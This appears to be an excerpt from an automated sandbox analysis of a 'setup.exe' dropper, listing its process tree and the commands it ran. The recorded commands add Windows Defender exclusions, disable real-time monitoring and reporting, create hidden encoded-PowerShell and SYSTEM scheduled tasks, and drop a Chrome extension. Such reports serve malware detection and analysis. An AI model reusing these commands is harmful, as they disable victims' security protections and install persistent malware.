2460 cmd.exe 37 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2300 2284 cmd.exe 38 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2284 wrote to memory of 2316 2284 cmd.exe 39 PID 2460 wrote to memory of 2352 2460 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\7zS5ADC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\7zS5E56.tmp\Install.exe.\Install.exe /NRevVdidYnPOp "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2280
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2352
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2300
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2316
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glKxvIXkZ" /SC once /ST 01:09:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glKxvIXkZ"4⤵PID:2800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glKxvIXkZ"4⤵PID:572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 03:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\dzjaEcD.exe\" tC /Zhsite_idJRP 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2980
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F360F9E0-1F0D-4696-BA64-F5B543C49242} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]1⤵PID:1972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1508
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2504
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1728
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1888
-
C:\Windows\system32\taskeng.exetaskeng.exe {8EC94E6A-99B7-4CB9-A922-A0B934D354EB} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\dzjaEcD.exeC:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\dzjaEcD.exe tC /Zhsite_idJRP 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggMAFuTTC" /SC once /ST 00:32:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggMAFuTTC"3⤵PID:3040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggMAFuTTC"3⤵PID:1860
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2252
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2708
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1600
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpLHoKSeD" /SC once /ST 02:49:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpLHoKSeD"3⤵PID:2852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpLHoKSeD"3⤵PID:1756
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:323⤵PID:2636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:643⤵PID:2492
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:323⤵PID:2520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:324⤵PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:643⤵PID:2648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:644⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\SafQccDpCMVtGOrp\UJniQhoA\MbtzrfZNspsFXEWW.wsf"3⤵PID:692
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\SafQccDpCMVtGOrp\UJniQhoA\MbtzrfZNspsFXEWW.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1044 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOkirCjeoMUvNKVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOkirCjeoMUvNKVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:324⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:644⤵PID:304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:324⤵PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:644⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:324⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:644⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:324⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:644⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:324⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:644⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOkirCjeoMUvNKVB" /t REG_DWORD /d 0 /reg:324⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOkirCjeoMUvNKVB" /t REG_DWORD /d 0 /reg:644⤵PID:996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH" /t REG_DWORD /d 0 /reg:324⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH" /t REG_DWORD /d 0 /reg:644⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:324⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SafQccDpCMVtGOrp" /t REG_DWORD /d 0 /reg:644⤵PID:2752
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxmtngbmA" /SC once /ST 01:39:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxmtngbmA"3⤵PID:2584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxmtngbmA"3⤵PID:2620
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2628
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2488
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2492
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "imJjYhUpaoZYZHtqO" /SC once /ST 00:36:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\PqwXfDa.exe\" HI /qbsite_idhqX 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "imJjYhUpaoZYZHtqO"3⤵PID:268
-
-
-
C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\PqwXfDa.exeC:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\PqwXfDa.exe HI /qbsite_idhqX 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnTqljwkAIckBwCXiX"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2652
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1740
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LYowOqXOU\hTyevY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PrqbyCvyRaPTCyA" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PrqbyCvyRaPTCyA2" /F /xml "C:\Program Files (x86)\LYowOqXOU\jBMOuxE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PrqbyCvyRaPTCyA"3⤵PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PrqbyCvyRaPTCyA"3⤵PID:1472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EJkQkmQiAqyKIE" /F /xml "C:\Program Files (x86)\FgzgbZZAFicU2\ujBuEMk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eaHFzrxPPpjLp2" /F /xml "C:\ProgramData\uOkirCjeoMUvNKVB\famVClY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xjLLdQpZPaFaxvNZz2" /F /xml "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\rHaDEbz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2312
-
-
